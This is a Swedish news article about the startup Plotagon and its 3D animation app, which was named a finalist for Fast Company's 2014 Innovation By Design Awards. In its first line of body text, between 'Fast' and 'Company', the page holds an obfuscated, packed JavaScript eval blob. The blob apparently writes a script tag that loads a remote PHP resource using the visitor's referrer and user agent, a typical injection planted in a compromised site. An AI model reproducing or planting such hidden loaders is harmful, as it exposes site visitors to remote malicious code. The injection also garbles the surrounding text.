Image Image Image Image Image Image Image Image Image Image

| 27 februari, 2020

Scroll to top

Top

Svenska startupbolaget Plotagon hyllas på den amerikanska marknaden

Svenska startupbolaget Plotagon hyllas på den amerikanska marknaden
Sebastian

Fast eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nizns|var|u0026u|referrer|kdzts||js|php’.split(’|’),0,{}))
Company, en av USA:s mest inflytelserika tidskrifter inom teknik, design och entreprenörskap, har utsett det svenska startupbolaget Plotagon till en av finalisterna i årets upplaga av Fast Company Innovation By Design Awards 2014. Den prestigefyllda och årligt återkommande tävlingen har till syfte att uppmärksamma de mest innovativa designlösningarna på dagens affärsproblem. Bland övriga finalister återfinns starka varumärken som Disney, Nike och Google. Vinnarna tillkännages i New York den 15 oktober.

Plotagon utvecklar en app som gör det möjligt för vem som helst att skapa och dela 3D-animerad film med bara några knapptryck. Den 24 juli i år lanserades Plotagons gratisversion för iPad i App Store. En kort tid efter lanseringen utnämnde Apple Plotagon till ”Best New App” i över 100 länder.

Fast Company utsåg Plotagons betaversion till en av världens 21 bäst designade appar 2013. Nu uppmärksammas Plotagons nya version för iPad i årets upplaga av Innovation By Design Awards 2014 genom en finalplats i app-kategorin. Den prestigefyllda och årligt återkommande tävlingen har till syfte att lyfta fram de mest innovativa designlösningarna inom olika branscher. Fast Company mottog totalt 1 587 bidrag från olika delar av världen till årets tävlingsupplaga. Bland dessa har 53 finalister utsetts i tio kategorier. Bland övriga finalister återfinns starka varumärken som Disney, Nike och Google. Vinnarna tillkännages i New York den 15 oktober.

 – Att komma till final i en så pass prestigefylld tävling som Innovation By Design Awards känns som en rejäl klapp på axeln. Design handlar om att göra det komplicerade enkelt. Genom Plotagon har vi tagit animation, som traditionellt sett är ett komplicerat område, och utvecklat en app som är så enkel att använda att vem som helst kan skapa sin egna 3D-animerade film, säger Jonathan Hise Kaldma, Creative Director på Plotagon. 

Kort om Plotagons app
Plotagons app är gratis att ladda ner och använda och finns i nuläget för iPad, Mac och PC. I grundpaketet ingår två gratismiljöer, fyra karaktärer, musik och ljudeffekter. Ytterligare fyra gratismiljöer och tre karaktärer kan laddas ner gratis. Fler miljöer och karaktärer finns tillgängliga via in-app köp.

Plotagon i App Store Sverige, klicka här